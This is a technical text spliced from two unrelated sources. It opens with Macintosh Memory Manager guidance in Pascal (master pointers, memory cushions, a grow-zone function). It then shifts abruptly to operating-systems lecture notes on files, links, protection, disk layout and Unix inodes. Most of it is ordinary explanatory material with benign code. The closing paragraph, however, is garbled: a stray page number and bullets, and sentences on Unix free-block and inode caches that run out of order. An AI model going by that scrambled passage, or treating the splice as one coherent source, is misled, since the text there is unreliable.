If, when you allocate a relocatable block, there are no unused master pointers in your application heap, the Memory Manager automatically allocates a new block of master pointers. For several reasons, however, you should try to prevent the Memory Manager from calling MoreMasters for you. First, MoreMasters executes more slowly if it has to move relocatable blocks up in the heap to make room for the new nonrelocatable block of master pointers; when your application first starts running, there are no such blocks that might have to be moved. Second, the new nonrelocatable block of master pointers is likely to fragment your application heap. At any time the Memory Manager is forced to call MoreMasters for you, there are already at least 64 relocatable blocks allocated in your heap. Unless all or most of those blocks are locked high in the heap (an unlikely situation), the new nonrelocatable block of master pointers might be allocated above existing relocatable blocks. This increases heap fragmentation.

To prevent this fragmentation, you should call MoreMasters at the beginning of your application enough times to ensure that the Memory Manager never needs to call it for you.

For example, if your application never allocates more than 300 relocatable blocks in its heap, then five calls to MoreMasters should be enough. It's better to call MoreMasters too many times than too few, so if your application usually allocates about 100 relocatable blocks but sometimes might allocate 1000 in a particularly busy session, you should call MoreMasters enough times at the beginning of the program to cover the larger figure.

You can determine empirically how many times to call MoreMasters by using a low-level debugger. First, remove all the calls to MoreMasters from your code and then give your application a rigorous workout, opening and closing windows, dialog boxes, and desk accessories as much as any user would. Then find out from your debugger how many times the system called MoreMasters. To do so, count the nonrelocatable blocks of size $100 bytes (decimal 256, or 64 × 4). Because of Memory Manager size corrections, you should also count any nonrelocatable blocks of size $108, $10C, or $110 bytes. (You should also check to make sure that your application doesn't allocate other nonrelocatable blocks of those sizes; if it does, subtract the number it allocates from the total.) Finally, call MoreMasters at least that many times at the beginning of your application.

Listing 1-4 illustrates a typical sequence of steps to configure your application heap and stack. The DoSetUpHeap procedure defined there increases the size of the stack by 32 KB, expands the application heap to its new limit, and allocates five additional blocks of master pointers.

Listing 1-4. Setting up your application heap and stack

CONST
   kExtraStackSpace = $8000;              {32 KB}
   kMoreMasterCalls = 5;                  {for 320 master ptrs}

PROCEDURE DoSetUpHeap;
VAR
   count: Integer;
BEGIN
   IncreaseStackSize(kExtraStackSpace);   {increase stack size}
   MaxApplZone;                           {extend heap to limit}
   FOR count := 1 TO kMoreMasterCalls DO
      MoreMasters;                        {64 more master ptrs}
END;

To reduce heap fragmentation, you should call DoSetUpHeap in a code segment that you never unload (possibly the main segment) rather than in a special initialization code segment. This is because MoreMasters allocates a nonrelocatable block; if you call MoreMasters from a code segment that is later purged, the new master pointer block is located above the purged space, thereby increasing fragmentation.

Determining the Amount of Free Memory

Because space in your heap is limited, you cannot usually honor every user request that would require your application to allocate memory.

For example, every time the user opens a new window, you probably need to allocate a new window record and other associated data structures. If you allow the user to open windows endlessly, you risk running out of memory. This might adversely affect your application's ability to perform important operations such as saving existing data in a window.

It is important, therefore, to implement some scheme that prevents your application from using too much of its own heap. One way to do this is to maintain a memory cushion that can be used only to satisfy essential memory requests. Before allocating memory for any nonessential task, you need to ensure that the amount of memory that remains free after the allocation exceeds the size of your memory cushion. You can do this by calling the function IsMemoryAvailable defined in Listing 1-5.

Listing 1-5. Determining whether allocating memory would deplete the memory cushion

FUNCTION IsMemoryAvailable (memRequest: LongInt): Boolean;
VAR
   total:   LongInt;                   {total free memory if heap purged}
   contig:  LongInt;                   {largest contiguous block if heap purged}
BEGIN
   PurgeSpace(total, contig);
   IsMemoryAvailable := ((memRequest + kMemCushion) < contig);
END;

The IsMemoryAvailable function calls the Memory Manager's PurgeSpace procedure to determine the size of the largest contiguous block that would be available if the application heap were purged; that size is returned in the contig parameter. If the size of the potential memory request together with the size of the memory cushion is less than the value returned in contig, IsMemoryAvailable is set to TRUE, indicating that it is safe to allocate the specified amount of memory; otherwise, IsMemoryAvailable returns FALSE. Notice that the IsMemoryAvailable function does not itself cause the heap to be purged or compacted; the Memory Manager does so automatically when you actually attempt to allocate the memory.

You should call the IsMemoryAvailable function before all nonessential memory requests, no matter how small. For example, suppose your application allocates a new, small relocatable block each time a user types a new line of text. That block might be small, but thousands of such blocks could take up a considerable amount of space.

Usually, the easiest way to determine how big to make your application's memory cushion is to experiment with various values. You should attempt to find the lowest value that allows your application to execute successfully no matter how hard you try to allocate memory to make the application crash. As an extra guarantee against your application's crashing, you might want to add some memory to this value. As indicated earlier in this chapter, 40 KB is a reasonable size for most applications.

CONST
   kMemCushion = 40 * 1024;            {size of memory cushion}

Note that when you call the IsMemoryAvailable function for a nonessential request, essential requests might have already dipped into the memory cushion. In that case, IsMemoryAvailable returns FALSE no matter how small the nonessential request is.

Allocating Blocks of Memory

As you have seen, a key element of the memory-management scheme presented in this chapter is to disallow any nonessential memory allocation requests that would deplete the memory cushion. In practice, this means that, before calling NewHandle, NewPtr, or another function that allocates memory, you should check that the amount of space remaining after the allocation, if successful, exceeds the size of the memory cushion. An easy way to do this is never to allocate memory for nonessential tasks by calling NewHandle or NewPtr directly. Instead call a function such as NewHandleCushion, defined in Listing 1-6, or NewPtrCushion, defined in Listing 1-7. You should never, however, call the IsMemoryAvailable function before an essential memory request; instead, you must make sure that essential requests can never deplete all of the cushion.

Some actions should never be rejectable. For example, you should guarantee that there is always enough memory free to save open documents and to perform typical maintenance tasks such as updating windows. Other user actions are likely to be always rejectable. For example, you should make the New Document and Open Document menu commands rejectable, because you cannot allow the user to create an endless number of documents. Although the decisions of which actions to make rejectable are usually obvious, modal and modeless dialog boxes present special problems. If you consider a certain dialog box (for instance, a spelling checker) nonessential, you must be prepared to inform the user that there is not enough memory to open it if memory space becomes low. If you want to make such dialog boxes available at all costs, you must ensure, when deciding how big to make the memory cushion for your application, that the cushion is large enough to handle the maximum number of these dialog boxes that the user could open at once.

Listing 1-6. Allocating relocatable blocks

FUNCTION NewHandleCushion (logicalSize: Size): Handle;
BEGIN
   IF NOT IsMemoryAvailable(logicalSize) THEN
      NewHandleCushion := NIL
   ELSE
      BEGIN
         SetGrowZone(NIL);             {remove grow-zone function}
         NewHandleCushion := NewHandleClear(logicalSize);
         SetGrowZone(@MyGrowZone);     {install grow-zone function}
      END;
END;

The NewHandleCushion function first calls IsMemoryAvailable to determine whether allocating the requested number of bytes would deplete the memory cushion. If so, NewHandleCushion returns NIL to indicate that the request has failed. Otherwise, if there is indeed sufficient space for the new block, NewHandleCushion calls NewHandleClear to allocate the relocatable block. Before calling NewHandleClear, however, NewHandleCushion disables the grow-zone function for the application heap. This prevents the grow-zone function from releasing any emergency memory reserve your application might be maintaining.

You can define a function NewPtrCushion to handle allocation of nonrelocatable blocks, as shown in Listing 1-7.

Listing 1-7. Allocating nonrelocatable blocks

FUNCTION NewPtrCushion (logicalSize: Size): Ptr;
BEGIN
   IF NOT IsMemoryAvailable(logicalSize) THEN
      NewPtrCushion := NIL
   ELSE
      BEGIN
         SetGrowZone(NIL);             {remove grow-zone function}
         NewPtrCushion := NewPtrClear(logicalSize);
         SetGrowZone(@MyGrowZone);     {install grow-zone function}
      END;
END;

Listing 1-8 illustrates a typical way to call NewPtrCushion.

Listing 1-8. Allocating a dialog record

FUNCTION GetDialog (dialogID: Integer): DialogPtr;
VAR
   myPtr: Ptr;                         {storage for the dialog record}
BEGIN
   myPtr := NewPtrCushion(SizeOf(DialogRecord));
   IF MemError = noErr THEN
      GetDialog := GetNewDialog(dialogID, myPtr, WindowPtr(-1))
   ELSE
      GetDialog := NIL;                {can't get memory}
END;

When you allocate memory directly, you can later release it by calling the DisposeHandle and DisposePtr procedures. When you allocate memory indirectly by calling a Toolbox routine, there is always a corresponding Toolbox routine to release that memory; for example, the DisposeWindow procedure releases memory allocated with the NewWindow function. Be sure to use these special Toolbox routines instead of the generic Memory Manager routines when applicable.

Maintaining a Memory Reserve

A simple way to help ensure that your application always has enough memory available for essential operations is to maintain an emergency memory reserve. This memory reserve is a block of memory that your application uses only for essential operations and only when all other heap space has been allocated. This section illustrates one way to implement a memory reserve in your application. To create and maintain an emergency memory reserve, you follow three distinct steps:

• When your application starts up, you need to allocate a block of reserve memory. Because you allocate the block, it is no longer free in the heap and does not enter into the free-space determination done by IsMemoryAvailable.
• When your application needs to fulfill an essential memory request and there isn't enough space in your heap to satisfy the request, you can release the reserve. This effectively ensures that you always have the memory you request, at least for essential operations.
• Each time through your main event loop, you should check whether the reserve has been released. If it has, you should attempt to recover the reserve. If you cannot recover the reserve, you should warn the user that memory is critically short.

To refer to the emergency reserve, you can declare a global variable of type Handle.

VAR
   gEmergencyMemory: Handle;           {handle to emergency memory reserve}

Listing 1-9 defines a function that you can call early in your application's execution (before entering your main event loop) to create an emergency memory reserve. The InitializeEmergencyMemory procedure defined in Listing 1-9 simply allocates a relocatable block of a predefined size; that block is the emergency memory reserve. This procedure also installs the application-defined grow-zone procedure.

Listing 1-9. Creating an emergency memory reserve

PROCEDURE InitializeEmergencyMemory;
BEGIN
   gEmergencyMemory := NewHandle(kEmergencyMemorySize);
   SetGrowZone(@MyGrowZone);
END;

A reasonable size for the memory reserve is whatever size you use for the memory cushion; once again, 40 KB is a good size for many applications.

CONST
   kEmergencyMemorySize = 40 * 1024;   {size of memory reserve}

When using a memory reserve, you need to change the IsMemoryAvailable function defined earlier in Listing 1-5. When determining whether a nonessential memory allocation request should be honored, you need to make sure that the memory reserve has not been released. To check that the memory reserve is intact, use the function IsEmergencyMemory defined in Listing 1-10.

Listing 1-10. Checking the emergency memory reserve

FUNCTION IsEmergencyMemory: Boolean;
BEGIN
   IsEmergencyMemory := (gEmergencyMemory <> NIL) & (gEmergencyMemory^ <> NIL);
END;

Then you can replace the function IsMemoryAvailable defined in Listing 1-5 by the version defined in Listing 1-11.

Listing 1-11. Determining whether allocating memory would deplete the memory cushion

FUNCTION IsMemoryAvailable (memRequest: LongInt): Boolean;
VAR
   total:   LongInt;                   {total free memory if heap purged}
   contig:  LongInt;                   {largest contiguous block if heap purged}
BEGIN
   IF NOT IsEmergencyMemory THEN       {is emergency memory available?}
      IsMemoryAvailable := FALSE
   ELSE
      BEGIN
         PurgeSpace(total, contig);
         IsMemoryAvailable := ((memRequest + kMemCushion) < contig);
      END;
END;

As you can see, this is exactly like the earlier version except that it indicates that memory is not available if the memory reserve is not intact.

Once you have allocated the memory reserve early in your application's execution, it should be released only to honor essential memory requests when there is no other space available in your heap. You can install a simple grow-zone function that takes care of releasing the reserve at the proper moment. Each time through your main event loop, you can check whether the reserve is still intact. To do this, add these lines of code to your main event loop, before you make your event call:

IF NOT IsEmergencyMemory THEN
   RecoverEmergencyMemory;

The RecoverEmergencyMemory function, defined in Listing 1-12, simply attempts to reallocate the memory reserve.

Listing 1-12. Reallocating the emergency memory reserve

PROCEDURE RecoverEmergencyMemory;
BEGIN
   ReallocateHandle(gEmergencyMemory, kEmergencyMemorySize);
END;

If you are unable to reallocate the memory reserve, you might want to notify the user that because memory is in short supply, steps should be taken to save any important data and to free some memory.

Defining a Grow-Zone Function

The Memory Manager calls your heap's grow-zone function only after other attempts to obtain enough memory to satisfy a memory allocation request have failed. A grow-zone function should be of the following form:

FUNCTION MyGrowZone (cbNeeded: Size): LongInt;

The Memory Manager passes to your function (in the cbNeeded parameter) the number of bytes it needs. Your function can do whatever it likes to free that much space in the heap; for example, your grow-zone function might dispose of certain blocks or make some unpurgeable blocks purgeable. Your function should return the number of bytes, if any, it managed to free.

When the function returns, the Memory Manager once again purges and compacts the heap and tries again to allocate the requested amount of memory. If there is still insufficient memory, the Memory Manager calls your grow-zone function again, but only if the function returned a nonzero value when last called. This mechanism allows your grow-zone function to release memory gradually; if the amount it releases is not enough, the Memory Manager calls it again and gives it the opportunity to take more drastic measures.

Typically a grow-zone function frees space by calling the EmptyHandle procedure, which purges a relocatable block from the heap and sets the block's master pointer to NIL. This is preferable to disposing of the space (by calling the DisposeHandle procedure), because you are likely to want to reallocate the block.

The Memory Manager might designate a particular relocatable block in the heap as protected; your grow-zone function should not move or purge that block. You can determine which block, if any, the Memory Manager has protected by calling the GZSaveHnd function in your grow-zone function.

Listing 1-13 defines a very basic grow-zone function. The MyGrowZone function attempts to create space in the application heap simply by releasing the block of emergency memory. First, it checks that (1) the emergency memory hasn't already been released and (2) the emergency memory is not a protected block of memory (as it would be, for example, during an attempt to reallocate the emergency memory block). If either of these conditions isn't true, then MyGrowZone returns 0 to indicate that no memory was released.

The function MyGrowZone defined in Listing 1-13 saves the current value of the A5 register when it begins and then restores the previous value before it exits. This is necessary because your grow-zone function might be called at a time when the system is attempting to allocate memory and the value in the A5 register is not correct. See the chapter "Memory Management Utilities" in this book for more information about saving and restoring the A5 register.

Listing 1-13. A grow-zone function that releases emergency storage

FUNCTION MyGrowZone (cbNeeded: Size): LongInt;
VAR
   theA5: LongInt;                     {value of A5 when function is called}
BEGIN
   theA5 := SetCurrentA5;              {remember current value of A5; install ours}
   IF (gEmergencyMemory^ <> NIL) & (gEmergencyMemory <> GZSaveHnd) THEN
      BEGIN
         EmptyHandle(gEmergencyMemory);
         MyGrowZone := kEmergencyMemorySize;
      END
   ELSE
      MyGrowZone := 0;                 {no more memory to release}
   theA5 := SetA5(theA5);              {restore previous value of A5}
END;

CHAPTER 9
CACHING AND INTRO TO FILE SYSTEMS

Introduction to File Systems

• File systems. Important topic - maybe the most important. In practice, the most crucial data is stored in file systems, and file system performance is a crucial component of overall system performance.
• What are files? Data that is readily available, but stored on non-volatile media. Standard place to store files: on a hard disk or floppy disk. Also, data may be a network away.
• What is stored in files? Latex source, C++ object files, FrameMaker source, PostScript files, Perl scripts, shell files, executables, databases, Nachos source, etc.
• In general, the meaning of a file is simply a sequence of bytes. The meaning of a file depends on the tools that manipulate it: the meaning of a Latex file is different for the Latex executable than for a standard text editor. Object file format has meaning to the linker. Executable file format has meaning to the OS.
• Some systems support a lot of different file types explicitly, with knowledge of file types built into the OS; the OS handles different kinds of files differently. IBM mainframes do this.
• Most systems let you organize files into a tree structure, so have directories and files.
• How do Unix tools tell file types apart? By looking at contents! For example, if a file starts with #!tool, the Unix shell interprets the file using tool. In Unix, how does the system tell executables apart from shell scripts apart from Perl files when it executes them?
  o Perl scripts - start with #!/usr/bin/perl.
  o Shell scripts - start with a #.
  o How about executables? Start with the Unix executable magic number. Recall the Nachos object file format.
  o What about PostScript files? Start with something like %!PS-Adobe-2.0, which printing utilities recognize.
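A minimal C sketch of this kind of content sniffing. The function name guess_type is invented for the example, and the ELF magic number shown is just one example of an executable magic number (different Unixes have used different ones):

#include <stdio.h>
#include <string.h>

/* Guess a file's type the way Unix tools do: by looking at contents. */
const char *guess_type(const char *path)
{
    char buf[8] = {0};
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return "unreadable";
    fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    if (memcmp(buf, "#!", 2) == 0)
        return "script (interpreter named after #!)";
    if (memcmp(buf, "%!PS", 4) == 0)
        return "PostScript";
    if (memcmp(buf, "\x7f" "ELF", 4) == 0)
        return "executable (magic number)";
    return "unknown - just a sequence of bytes";
}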

• What about DOS? Have an ad-hoc file typing mechanism built into file naming conventions. .com and .exe identify two different kinds of executables; .bat identifies a text batch file. These are enforced by the OS (because it is involved with launching executables). Other file extensions are recognized by other programs but not by the OS.
• What about the Macintosh? All files have a type (pict, text) and the name of the program that created the file. When you double click on the file, it automatically starts the program that created the file and loads the file. Have to have utilities that twiddle the file metadata (types and program names).
• In Unix, file type is implicit. Single exception: directories and symbolic links are explicitly tagged.
• File attributes:
  o Name
  o Type - in Unix, implicit.
  o Location - where the file is stored on disk.
  o Size
  o Protection
  o Time, date and user identification. Very important for data security.
• All file system information is stored in nonvolatile storage in a way that it can be reconstructed on a system crash.
• How do programs access files? Several general ways:
  o Sequential - open it, then read or write from beginning to end.
  o Direct - specify the starting address of the data.
  o Indexed - index the file by an identifier (a name, for example), then retrieve the record associated with that name.
• Files may be accessed more than one way. A payroll file, for example, may be accessed sequentially by the paycheck program and indexed by the personnel office.
• File structure can be optimized for a given access mode. For sequential access, can have the file just laid out sequentially on disk. For direct access, can have a disk block table telling where each disk block is; to access the data, first traverse the disk block table to find the right disk block, then go to the block containing the data. Nachos executable files are accessed directly.
• Easy to simulate a sequential access file given a direct access file - just keep track of the current file position, as the sketch below shows. But simulating a direct access file with a sequential access file is a lot harder.
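Here is a minimal sketch of that easy direction, layered over the POSIX positioned-read call pread; the SeqFile type and seq_read function are names invented for the example:

#include <sys/types.h>
#include <unistd.h>

/* Sequential access on top of a direct-access (seekable) file:
   keep track of the current position and advance it on every read. */
typedef struct {
    int   fd;    /* direct-access file descriptor */
    off_t pos;   /* current sequential position */
} SeqFile;

ssize_t seq_read(SeqFile *f, void *buf, size_t n)
{
    ssize_t got = pread(f->fd, buf, n, f->pos);  /* direct read at pos */
    if (got > 0)
        f->pos += got;   /* advancing this is all "sequential" means */
    return got;
}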

• For more sophisticated indexed access, may build an index file. Example: IBM ISAM (Indexed Sequential Access Method). The user selects a key, and the system builds a two-level index for the key. Uses binary search at each level of the index, then linear search within the final block.
• Fundamental design choice: lots of file formats or few file formats? Unix: few (one). VMS: few (three). IBM: lots (I don't know just how many). Advantage of lots of file formats: the user probably has one that fits the bill. Disadvantages: the OS becomes larger, and the system becomes harder to use (must choose a file format, and if you get it wrong it is a big problem).
• Directory structure. To organize files, many systems provide a hierarchical file system arrangement. Common arrangement: tree of files. Can have files, and then directories of files. Naming can be absolute, relative, or both. Typically a useful file system structuring tool.
• There is sometimes a need to share files between different parts of the tree. Can get to the same file in multiple ways, so the structure becomes a graph. Unix supports two kinds of links; the link command (ln) sets these links up.
  o Symbolic links: the directory entry is the name of another file. If that file is moved, the symbolic link still points to the (now non-existent) file; if another file is copied into that spot, the symbolic link all of a sudden points to it.
  o Hard links: stick with the file. If the file is moved, the hard link still points to the file.
• Uses for soft links? Can have two people share files. Can also set up source directories, then link compilation directories to source directories.
• Graph structure introduces complications. First, only want to traverse files once even if there are multiple references to the same file; tar handles this well, but cp does not handle it well for soft links. Second, must be sure not to delete hard-linked files until all pointers to them are gone. To get rid of a file, must delete it from all places that have hard links to it. Standard solution: reference counts.
• What about cyclic graph structures? Problem is that cycles may make reference counts not work - can have a section of the graph that is disconnected from the rest, but all entries have positive reference counts. Only solution: garbage collect. Standard technique: marking. Not done very often because it takes so long. Unix prevents users from making hard links create cycles by only allowing hard links to point to files, not directories. But there are still some cycles in the structure.
• Standard view of the system: data is stored in the address space of a process, but the data goes away when the process dies. If you want to preserve data, must write it to disk, then read it back in again when you need it. Notice how memory hierarchy considerations drive file implementation.
• Writing IO routines to dump data to disk and back again is a real hassle. Solution: memory-mapped files. Can map part of a file into a process's address space and read and write the file like a normal piece of memory; in Unix, the system call that sets this up is the mmap system call. Sort of like memory-mapped IO, generalized to user level. Used for stuff like snapshot files in interactive systems. Programs can dump data structures to disk without having to write routines to linearize, output and read in data structures. And if programs share data using files, processes can share persistent data directly with no hassles. Problem: must maintain consistency between the file and data read in via some other mechanism. How is sharing set up for processes on the same machine? What about processes on different machines?
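A sketch of the setup just described, using the POSIX mmap interface; after the map succeeds, ordinary loads and stores on p are reads and writes of the file:

#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Map a whole file into the address space and update it with a store. */
int touch_first_byte(const char *path)
{
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size == 0) { close(fd); return -1; }
    char *p = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE,
                   MAP_SHARED, fd, 0);
    if (p == MAP_FAILED) { close(fd); return -1; }
    p[0] = '#';                 /* an ordinary store - now a file write */
    munmap(p, st.st_size);      /* changes propagate back to the file */
    close(fd);
    return 0;
}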

• Next issue: protection. Why is protection necessary? Because people want to share files, but not share all aspects of all files. Want protection on an individual file and operation basis. Examples:
  o All people in a research group should be able to read and write source files. Others should not be able to access them.
  o Everybody should be able to read files in a given directory.
  o Professor wants students to read but not write assignments.
  o Professor wants to keep the exam in the same directory as the assignments, but students should not be able to read the exam.
  o Can execute but not write commands like cp, cat, etc.
• Conceptually, have operations (open, read, write, execute), resources (files) and principals (users or processes). Can describe the desired protection using an access matrix: a list of principals across the top and resources on the side. Each entry of the matrix lists the operations that the principal can perform on the resource.
• Two standard mechanisms for access control: access lists and capabilities.
  o Access lists: for each resource (like a file), give a list of principals allowed to access that resource and the access they are allowed to perform. Each row of the access matrix is an access list.
  o Capabilities: for each resource and access operation, give out capabilities that give the holder the right to perform the operation on that resource. Capabilities must be unforgeable. Each column of the access matrix is a capability list.
• Who controls access lists and capabilities? Done under OS control. Instead of organizing access lists on a principal by principal basis, for convenience, want to create coarser grain concepts: can organize on a group basis. Will talk more about security later.

• What is the Unix security model? Have three operations - read, write and execute. Protections are given for each operation on the basis of everybody, group and owner. Each file has an owner and a group. Like everything else in Unix, it is a fairly simple and primitive protection strategy. Unix file listing:

 4 drwxr-xr-x  2 martin faculty   2048 May 15 21:03 ./
 2 drwxr-xr-x  7 martin faculty    512 May  3 17:46 ../
 2 -rw-r-----  1 martin faculty    213 Apr 19 22:27 a0.aux
72 -rw-r--r--  1 martin faculty  36617 Apr 19 22:27 a0.dvi
 8 -rw-r-----  1 martin faculty   3488 Apr 19 22:27 a0.log
 4 -rw-r-----  1 martin faculty   1218 Apr 19 22:27 a0.ps
 6 -rwxr-xr-x  1 martin faculty   2599 Apr  5 18:07 a0.tex*

• How are files implemented on a standard hard-disk based system? It is up to the OS to implement them. Why must the OS do this? Protection.
• What does a disk look like? It is a stack of platters. Each platter may have two surfaces (one per side). There is one disk head per surface. The heads move back and forth between the platters as a unit, with the heads riding on a cushion of air. The surfaces revolve beneath the heads. The area beneath a stationary head is a track; each track is broken up into sectors. A sector is the unit of disk transfer. The set of tracks that can be accessed without moving the heads is a cylinder. To read a given sector, first move the heads to that sector's cylinder (seek time), then wait for the sector to rotate under the head (latency time), then copy the data off of the disk into memory (transfer time).
• Typical hard disk statistics (Sequel 5400 from August 1993, a 5.25 inch, 4.0 Gbyte disk):
  o Platters: 13
  o Read/Write heads: 26
  o Tracks/Surface: 3,058
  o Track Capacity (bytes): 40,448-60,928
  o Bytes/Sector: 512
  o Sectors/Track: 79-119
  o Media Transfer Rate (MB/s): 3.6-5.5
  o Track-to-track Seek: 1.3 ms
  o Max Seek: 25 ms
  o Average Seek: 12 ms
  o Rotational Speed: 5,400 rpm
  o Average Latency: 5.6 ms
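Plugging the figures above into the standard service-time estimate (seek + rotational latency + transfer) shows why the mechanical delays dominate; a small sketch:

#include <stdio.h>

/* Rough service time for one 512-byte sector, using the statistics
   quoted above: average seek + average rotational latency + transfer. */
int main(void)
{
    double seek_ms    = 12.0;                    /* average seek */
    double latency_ms = 5.6;                     /* half a rotation */
    double xfer_ms    = 512.0 / 3.6e6 * 1000.0;  /* ~0.14 ms at 3.6 MB/s */
    printf("%.2f ms per sector\n", seek_ms + latency_ms + xfer_ms);
    /* about 17.7 ms - the transfer itself is almost negligible */
    return 0;
}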

• How does this compare to timings for a standard workstation? The DECStation 5000 is a standard workstation available in 1993. It had a 33 MHz MIPS R3000 and 60 ns memory. How many instructions can it execute in 30 ms (about the time for an average seek plus average latency)? 33 * 30 * 1000 = 990,000.
• What does the disk look like to the OS? Just a sequence of sectors. All sectors in a track are in sequence; all tracks in a cylinder are in sequence; adjacent cylinders are in sequence. The OS may logically link several disk sectors together to increase the effective disk block size; each disk block consists of a number of consecutive sectors. In effect, the disk is just a big array of fixed-size chunks, and the job of the OS is to implement file system abstractions on top of these chunks.
• How does the OS access the disk? There is a piece of hardware on the disk called a disk controller. The OS issues instructions to the disk controller, using either IO instructions or memory-mapped IO operations.

File System Implementation

• Discuss several file system implementation strategies.
• First implementation strategy: contiguous allocation. Just lay out the file in contiguous disk blocks. Used in VM/CMS - an old IBM interactive system.
  Advantages:
  o Quick and easy calculation of the block holding data - just an offset from the start of the file!
  o For sequential access, almost no seeks required.
  o Even direct access is fast - just seek and read. Only one disk access.
  Disadvantages:
  o Where is the best place to put a new file?
  o Problems when the file gets bigger - may have to move the whole file!!
  o External fragmentation. Compaction may be required, and it can be very expensive.
• Next strategy: linked allocation. All files stored in fixed size blocks. Link together adjacent blocks like a linked list.
  Advantages:
  o No more variable-sized file allocation problems. Everything takes place in fixed-size chunks, which makes memory allocation a lot easier.
  o No more external fragmentation.
  o No need to compact or relocate files.
  Disadvantages:
  o Potentially terrible performance for direct access files - have to follow pointers from one disk block to the next!
  o Even sequential access is less efficient than for contiguous files, because it may generate long seeks between blocks. Plus, many operations require multiple disk accesses.
  o Reliability - if you lose one pointer, you have big problems.
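The difference in lookup cost is easy to see in code. A sketch, where read_next_pointer is a hypothetical helper that fetches a block's next-pointer and may cost a disk access each call:

/* Which disk block holds byte `off` of a file? */

unsigned read_next_pointer(unsigned block);   /* assumed: 1 disk access */

/* Contiguous allocation: a single calculation, no extra disk accesses. */
unsigned contig_block(unsigned start, unsigned off, unsigned bsize)
{
    return start + off / bsize;
}

/* Linked allocation: chase pointers, one (possibly on-disk) step per block. */
unsigned linked_block(unsigned first, unsigned off, unsigned bsize)
{
    unsigned b = first;
    for (unsigned i = 0; i < off / bsize; i++)
        b = read_next_pointer(b);
    return b;
}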

• FAT allocation. Instead of storing the next pointer in each block, have a table of next pointers indexed by disk block. MS/DOS and OS/2 use this scheme. Supports fast direct file access, and not bad for sequential access: still have to linearly traverse the next pointers, but at least don't have to go to disk for each of them - can just cache the FAT and do the whole traverse in memory (the same walk as linked_block above, but over the in-memory table). The table pointer of the last block in a file has an EOF pointer value. Free blocks have a table pointer of 0, so allocation of free blocks with the FAT scheme is straightforward: just search for the first block with a 0 table pointer.
• Indexed schemes. Give each file an index table. Each entry of the index points to the disk blocks containing the actual file data. Question: how to allocate the index table? It must be stored on disk like everything else in the file system, and there are basically the same alternatives as for the file itself! Contiguous, linked, and multilevel index. In practice some combination scheme is usually used. This whole discussion is reminiscent of paging discussions.
• Will now discuss how traditional Unix lays out the file system:
  o First 8KB - label + boot block.
  o Next 8KB - superblock plus free inode and disk block cache.
  o Next 64KB - inodes. Each inode corresponds to one file.
  o Until end of file system - disk blocks.
• What is in an inode? Information about a file; each inode corresponds to one file. Important fields:
  o Mode. This includes protection information and the file type. The file type can be normal file (-), directory (d), symbolic link (l), etc.
  o Owner.
  o Number of links - the number of directory entries that point to this inode.
  o Length - how many bytes long the file is.
  o Nblocks - the number of disk blocks the file occupies.

  o Array of 10 direct block pointers. These are the first 10 blocks of the file. Assume the block size is 512 bytes (i.e. one sector); then to access any of the first 512*10 bytes of the file, can just go straight from the inode.
  o One indirect block pointer. Points to a block full of pointers to disk blocks. To access data farther in, must go indirect through at least one level of indirection.
  o One doubly indirect block pointer. Points to a block full of pointers to blocks full of pointers to disk blocks.
  o One triply indirect block pointer. (Not currently used.)
  The sketch after this section shows how a byte offset selects a pointer level.
• So, a file consists of an inode and the disk blocks that it points to. Nblocks and Length do not contain redundant information - can have holes in files. A hole shows up as block pointers that point to block 0 - i.e., nothing in that block. Do a simple file system example: draw out the inodes and disk blocks.
• What does a directory look like? It is a file consisting of a list of (name, inode number) pairs. In early Unix systems the name was a maximum of 14 characters long and the inode number was 2 bytes. Later versions of Unix removed this restriction; each directory entry was variable length and also included the length of the file name. Why don't inodes contain names? Because we would like a file to be able to have multiple names.
• How does Unix implement the directories . and ..? They are just names in the directory: . points to the inode of the directory itself, while .. points to the inode of the directory's parent directory. So, there are some circularities in the file system structure.
• A user can refer to files in one of two ways: relative to the current directory, or relative to the root directory. How does the system convert a name to an inode? There is a routine called namei that does it. Where does lookup for the root start? By convention, inode number 2 is the inode for the top directory; if a name starts with /, lookup starts at the file for inode number 2.
• What about symbolic links? A symbolic link is a file containing a file name. Whenever a Unix operation has the name of the symbolic link as a component of a file name, it macro substitutes the name in the file in for the component.
• What disk accesses take place when you list a directory, cd to a directory, or cat a file? Is there any difference between ls and ls -F?
• What about when you use the Unix rm command? Does it always delete the file? NO - it decrements the reference count. If the count is then 0, it frees up the space. Does this algorithm work for directories? NO - a directory has a reference to itself (.), so the count includes that entry. Use a different command.
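As promised above, a sketch of the offset-to-level calculation, using the 512-byte blocks assumed in these notes and 4-byte block numbers (so 128 block numbers fit in an indirect block):

#include <stdio.h>

#define BSIZE   512UL                /* block size assumed above */
#define NDIRECT 10UL                 /* direct block pointers in the inode */
#define NINDIR  (BSIZE / 4UL)        /* 128 block numbers per indirect block */

/* Which level of inode pointer covers byte `off` of a file? */
const char *level_of(unsigned long off)
{
    unsigned long b = off / BSIZE;   /* logical block number */
    if (b < NDIRECT)                   return "direct";
    b -= NDIRECT;
    if (b < NINDIR)                    return "single indirect";
    b -= NINDIR;
    if (b < NINDIR * NINDIR)           return "double indirect";
    b -= NINDIR * NINDIR;
    if (b < NINDIR * NINDIR * NINDIR)  return "triple indirect";
    return "beyond maximum file size";
}

int main(void)
{
    printf("%s\n", level_of(4000UL));      /* direct */
    printf("%s\n", level_of(60000UL));     /* single indirect */
    printf("%s\n", level_of(2000000UL));   /* double indirect */
    return 0;
}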

145 • • • • • . Note that OS maintains a list of free disk blocks. Each disk block in this sequence stores a sequence of free disk block numbers. If not. put it in superblock's inode cache if there is room. so it is replicated on disk in case part of disk fails. So. keep looking until wrap or fill inode cache in superblock. But.will start looking there next time.any bit pattern is OK for disk blocks. but only a cache of free inodes. and use it as the free disk block. The inode cache is a stack of free inodes. then put index of newly free disk block in as first number in superblock's disk block. If the inode cache is empty. it linearly searches inode list on disk to find free inodes. To free an inode. Only check against the number where OS stopped looking for inodes the last time it filled the cache. The superblock has the first disk block in this sequence. The rest of the numbers are the numbers of free disk blocks. write superblock's disk block into free block. OS stores list of free disk blocks as follows. If not. it contains the index of the next block in the disk block sequence. check the superblock's block of free disk blocks. To free a disk block do the reverse. Make this number the minimum of the freed inode number and the number already there. the index points to the top of the stack. when go to search inode list for free inodes. The first number in each disk block is the number of the next disk block in this sequence. The superblock also contains crucial information. But. grab the one at the top and decrement the index of next free block. If there are at least two 